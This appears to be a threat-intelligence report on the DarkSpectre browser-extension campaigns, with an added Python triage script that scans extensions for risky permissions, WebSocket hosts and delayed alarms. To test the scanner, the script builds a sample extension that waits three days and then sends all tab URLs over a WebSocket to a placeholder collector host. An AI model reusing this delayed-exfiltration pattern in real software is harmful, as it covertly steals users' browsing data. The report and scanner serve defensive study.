Full Report
The threat actor behind two malicious browser extension campaigns, ShadyPanda and GhostPoster, has been attributed to a third attack campaign codenamed DarkSpectre that has impacted 2.2 million users of Google Chrome, Microsoft Edge, and Mozilla Firefox. The activity is assessed to be the work of a Chinese threat actor that Koi Security is tracking under the moniker DarkSpectre. In all, the
Analysis Summary
# Threat Actor: DarkSpectre
## Attribution & Identity
* **Primary Identification:** DarkSpectre (Moniker used by Koi Security).
* **Attribution:** Assessed to be a Chinese threat actor.
* **Known Aliases/Associated Groups:** Linked to the actors behind the malicious browser extension campaigns previously tracked as ShadyPanda and GhostPoster.
## Activity Summary
DarkSpectre is responsible for three known malicious browser extension campaigns which have collectively impacted over 8.8 million users over a period spanning more than seven years:
1. **ShadyPanda:** Affected 5.6 million users across Chrome, Edge, and Firefox. Objectives included data theft, search query hijacking, and affiliate fraud. This campaign utilized extensions containing logic bombs (e.g., "New Tab - Customized Dashboard") set to activate maliciously after a delay (e.g., three days) to bypass review processes. It involved over 100 flagged extensions, with 9 currently active and 85 identified as "dormant sleepers" designed to build a user base before receiving weaponizing updates years later.
2. **GhostPoster:** Primarily targeted Mozilla Firefox users with seemingly benign utilities and VPN tools to inject tracking code and hijack affiliate links for click/ad fraud.
3. **The Zoom Stealer:** A campaign involving 18 extensions across Chrome, Edge, and Firefox, specifically designed to collect corporate meeting intelligence. This campaign impacted 2.2 million users.
## Tactics, Techniques & Procedures
* **Malicious Deployment via Browser Extensions:** Distributing malware through official or quasi-official browser repositories (Chrome Web Store, Edge Add-ons, Firefox Add-ons).
* **Logic Bombs/Time Delays:** Implementing code that triggers malicious functionality after a specified delay (e.g., three days) post-installation to evade initial security screening.
* **Dormant Sleepers:** Maintaining seemingly benign extensions to cultivate a large user base before pushing malicious updates after long periods of inactivity (up to five years in some cases).
* **Masquerading/Impersonation:** Designing extensions to mimic legitimate or popular tools, particularly for enterprise videoconferencing applications (Zoom, Google Meet, GoTo Webinar).
* **Data Exfiltration (Meeting Intelligence):** Harvesting sensitive meeting data in real-time over WebSocket connections, including meeting URLs (with embedded passwords), meeting IDs, topics, scheduled times, and registration status.
* **Information Harvesting (Webinar/Corporate):** Collecting details about webinar speakers/hosts (names, titles, affiliations, photos) and session metadata.
* **Fraud:** Engaging in affiliate link hijacking and committing click/ad fraud.
## Targeting
* **Sectors:** No specific sectors are named. The Zoom Stealer campaign's focus on enterprise videoconferencing tools (Zoom, Google Meet, GoTo Webinar) implies that corporate environments, and any organization that runs meetings and webinars through those tools, are the primary targets.
* **Geography:** Global ("Impacting 8.8 Million Users Worldwide").
* **Victims:** 2.2 million users impacted by the DarkSpectre campaign subset (Zoom Stealer), and 5.6 million by the ShadyPanda subset. Specific organizations are not named, but the emphasis on corporate meeting intelligence indicates that enterprise users are the intended victims.
## Tools & Infrastructure
* **Malware Families Used:** Malicious browser extensions tailored for specific malicious functions (data theft, hijacking, intelligence exfiltration).
* **Infrastructure (C2, domains, IPs):** Data exfiltration occurs over a **WebSocket connection** in real-time. Specific C2 details were not provided in the text snippet.
## Implications
The sustained nature (seven years) and massive scale (8.8 million users) of these campaigns highlight a sophisticated, patient Chinese threat actor focused on establishing wide-ranging persistence within end-user environments via seemingly trusted browser extensions. The shift toward stealing corporate meeting intelligence suggests a focus on espionage, corporate reconnaissance, or business email compromise (BEC) preparation, moving beyond simple ad fraud. The use of logic bombs and dormant sleepers demonstrates advanced evasion tactics intended to maintain credibility across platform reviews.
## Mitigations
* Conduct thorough scrutiny of newly installed browser extensions, paying special attention to those offering features related to popular productivity or meeting software.
* Monitor browser extension behavior for unusual network connections, particularly WebSocket traffic to unknown external servers.
* Limit permissions granted to browser extensions, ensuring they only request necessary access rights.
* Implement controls or use enterprise security solutions that can detect and block logic bombs or delayed malicious payloads post-installation.
* Use enterprise endpoint/browser monitoring to detect real-time data exfiltration patterns, especially concerning meeting credentials or sensitive data structures.
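The following triage script is an added example, not Koi Security's tooling or code from any of the campaigns. It statically scans an unpacked extension for the indicator classes described in the TTPs and mitigations above: broad permissions, WebSocket endpoints (the exfiltration channel), and delayed triggers set via `chrome.alarms` (the logic-bomb pattern). The sample extension it builds, including the `collector.example.invalid` host, is constructed for illustration.

```python
"""Added triage script (not the project's or vendor's code): flags the indicator
classes this report lists in an unpacked browser extension. The sample
extension written by build_sample() is constructed for illustration."""
import json, re, tempfile
from pathlib import Path
from urllib.parse import urlparse

BROAD_PERMS = {"<all_urls>", "tabs", "webRequest", "scripting", "cookies", "history"}
WS_RE = re.compile(r"new\s+WebSocket\(\s*['\"](wss?://[^'\"]+)")
# Captures the delay of chrome.alarms.create({delayInMinutes: N}) / periodInMinutes: N
ALARM_RE = re.compile(r"chrome\.alarms\.create\([^)]*?(?:delayInMinutes|periodInMinutes)\s*:\s*(\d+)")

def scan_extension(ext_dir):
    """Return indicator lists found in manifest.json and all *.js files under ext_dir."""
    ext = Path(ext_dir)
    manifest = json.loads((ext / "manifest.json").read_text())
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    findings = {"broad_permissions": sorted(perms & BROAD_PERMS),
                "websocket_hosts": [], "delayed_triggers": []}
    for js in sorted(ext.rglob("*.js")):
        src = js.read_text()
        findings["websocket_hosts"] += [urlparse(u).hostname for u in WS_RE.findall(src)]
        findings["delayed_triggers"] += [f"{js.name}: alarm {m} min ({int(m) / 1440:.1f} days)"
                                         for m in ALARM_RE.findall(src)]
    return findings

def risk_score(findings):
    """Count indicator classes present; two or more warrants manual review before deployment."""
    return sum(1 for hits in findings.values() if hits)

def build_sample():
    """Write a constructed 'New Tab' style extension that sleeps three days, then opens a WebSocket."""
    d = Path(tempfile.mkdtemp())
    (d / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "New Tab Dashboard (constructed sample)",
        "permissions": ["tabs", "alarms", "storage"], "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.js"}}))
    (d / "background.js").write_text(
        "chrome.alarms.create('sync', {delayInMinutes: 4320});\n"  # 3-day review-evasion delay
        "chrome.alarms.onAlarm.addListener(() => {\n"
        "  const ws = new WebSocket('wss://collector.example.invalid/feed');\n"
        "  chrome.tabs.query({}, tabs => ws.send(JSON.stringify(tabs.map(t => t.url))));\n"
        "});\n")
    return d

if __name__ == "__main__":
    print(json.dumps(scan_extension(build_sample()), indent=2))
```

Point `scan_extension` at any unpacked extension directory (for Chrome, the profile's `Extensions/<id>/<version>/` folder) and treat a score of 2 or more as a prompt for manual review, not as proof of malice.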